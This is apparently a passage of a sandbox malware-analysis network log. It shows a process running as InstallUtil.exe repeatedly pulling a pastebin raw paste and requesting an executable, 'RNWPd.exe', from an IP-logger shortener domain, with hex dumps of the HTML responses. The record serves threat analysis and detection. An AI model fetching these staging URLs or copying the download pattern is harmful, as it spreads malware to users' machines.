                          2024-09-12 20:01:49 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                          Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                          2024-09-12 20:01:49 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                          Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                          2024-09-12 20:01:49 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                          2024-09-12 20:01:49 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.849728172.67.19.244436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:54 UTC50OUTGET /raw/V6VJsrV3 HTTP/1.1
                          Host: pastebin.com
                          2024-09-12 20:01:54 UTC222INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Frame-Options: SAMEORIGIN
                          Server: cloudflare
                          CF-RAY: 8c227dfb4db78ce8-EWR
                          2024-09-12 20:01:54 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                          Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                          2024-09-12 20:01:54 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                          Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                          2024-09-12 20:01:54 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                          Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                          2024-09-12 20:01:54 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                          Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                          2024-09-12 20:01:54 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.849729188.114.96.34436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:54 UTC65OUTGET /RNWPd.exe HTTP/1.1
                          Host: yip.su
                          Connection: Keep-Alive
                          2024-09-12 20:01:55 UTC904INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          memory: 0.36197662353515625
                          expires: Thu, 12 Sep 2024 20:01:55 +0000
                          strict-transport-security: max-age=604800
                          strict-transport-security: max-age=31536000
                          content-security-policy: img-src https: data:; upgrade-insecure-requests
                          x-frame-options: SAMEORIGIN
                          Cache-Control: max-age=14400
                          CF-Cache-Status: EXPIRED
                          Last-Modified: Thu, 12 Sep 2024 20:01:55 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p6iPwgTQlClVts69JRHjnTWjhmg54fAg%2BPIORrBnPErq5Q32ECef6rf5IshKNl9sKwtNiZc1S4eRhsZTuH7jHBujhOLimyVC%2F%2B3z1ce%2FcHm5tF%2BGRIh1PGk%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8c227dff1e637c84-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-09-12 20:01:55 UTC465INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                          Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                          2024-09-12 20:01:55 UTC1369INData Raw: 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f
                          Data Ascii: t-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta pro
                          2024-09-12 20:01:55 UTC1369INData Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65
                          Data Ascii: und-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-de
                          2024-09-12 20:01:55 UTC1369INData Raw: 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e
                          Data Ascii: .userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(n
                          2024-09-12 20:01:55 UTC1369INData Raw: 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72
                          Data Ascii: ><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;bor
                          2024-09-12 20:01:55 UTC1369INData Raw: 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20
                          Data Ascii: 31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div
                          2024-09-12 20:01:55 UTC160INData Raw: 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: .style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                          2024-09-12 20:01:55 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.849730172.67.19.244436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:02:00 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                          Host: pastebin.com
                          Connection: Keep-Alive
                          2024-09-12 20:02:00 UTC222INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:02:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Frame-Options: SAMEORIGIN
                          Server: cloudflare
                          CF-RAY: 8c227e1f2c530cdd-EWR
                          2024-09-12 20:02:00 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                          Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                          2024-09-12 20:02:00 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                          Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                          2024-09-12 20:02:00 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                          Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                          2024-09-12 20:02:00 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                          Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                          2024-09-12 20:02:00 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.849731188.114.96.34436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:02:00 UTC65OUTGET /RNWPd.exe HTTP/1.1
                          Host: yip.su
                          Connection: Keep-Alive
                          2024-09-12 20:02:00 UTC898INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:02:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          memory: 0.36197662353515625
                          expires: Thu, 12 Sep 2024 20:02:00 +0000
                          strict-transport-security: max-age=604800
                          strict-transport-security: max-age=31536000
                          content-security-policy: img-src https: data:; upgrade-insecure-requests
                          x-frame-options: SAMEORIGIN
                          Cache-Control: max-age=14400
                          CF-Cache-Status: EXPIRED
                          Last-Modified: Thu, 12 Sep 2024 20:02:00 GMT
